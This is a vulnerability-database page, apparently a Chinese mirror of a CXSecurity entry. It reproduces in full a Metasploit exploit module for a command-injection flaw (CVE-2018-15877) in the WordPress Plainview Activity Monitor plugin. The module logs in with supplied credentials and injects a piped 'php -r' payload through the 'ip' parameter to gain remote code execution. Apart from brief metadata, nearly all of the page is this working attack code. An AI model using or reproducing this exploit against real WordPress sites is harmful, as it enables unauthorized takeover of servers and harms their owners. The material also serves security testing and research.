WordPress Plainview Activity Monitor 20161228 Remote Command Execution - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1841734 漏洞类型
发布时间 2019-11-30 更新时间 2019-11-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110179
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::HttpClient

  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Plainview Activity Monitor RCE',
      'Description'    => %q{
          Plainview Activity Monitor Wordpress plugin is vulnerable to OS
          command injection which allows an attacker to remotely execute
          commands on underlying system. Application passes unsafe user supplied
          data to ip parameter into activities_overview.php.
          Privileges are required in order to exploit this vulnerability.

          Vulnerable plugin version: 20161228 and possibly prior
          Fixed plugin version: 20180826
      },
      'Author'	=>
        [
          'LydA(c)ric LEFEBVRE', # Vulnerability discovery
          'Leo LE BOUTER', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-15877' ],
          [ 'EDB', '45274' ],
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'BadChars' => '&>\'',
        },
      'Targets'        => [['WordPress', {}]],
      'DisclosureDate' => 'Aug 26 2018'
      ))

      register_options(
        [
          OptString.new('USERNAME', [ true,  "The user to authenticate as"]),
          OptString.new('PASSWORD', [ true,  "The password to authenticate with" ])
        ])

      register_advanced_options(
        [
          OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
        ])
  end

  def check
    unless wordpress_and_online?
      vprint_error("#{target_uri} does not seeem to be Wordpress site")
      return CheckCode::Unknown
    end
    check_plugin_version_from_readme('plainview-activity-monitor', '20180826')
  end

  def exploit
    check_code = check
    unless check_code == CheckCode::Detected || check_code == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    user = datastore['USERNAME']
    password = datastore['PASSWORD']

    print_status("Trying to login...")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
    end
    print_good("Login Successful")
    store_valid_credential(user: user, private: password, proof: cookie)

    uri = normalize_uri(target_uri.path, 'wp-admin/admin.php')

    vars_get = {
      'page' => 'plainview_activity_monitor',
      'tab'  => 'activity_tools'
    }

    vars_post = {
      'ip'     => "localhost | php -r '#{payload.encoded}'",
      'lookup' => 'Lookup',
      'submit' => 'Submit request'
    }

    send_request_cgi(
      'method'    => 'POST',
      'cookie'    => cookie,
      'uri'       => uri,
      'vars_get'  => vars_get,
      'vars_post' => vars_post
    )
  end
end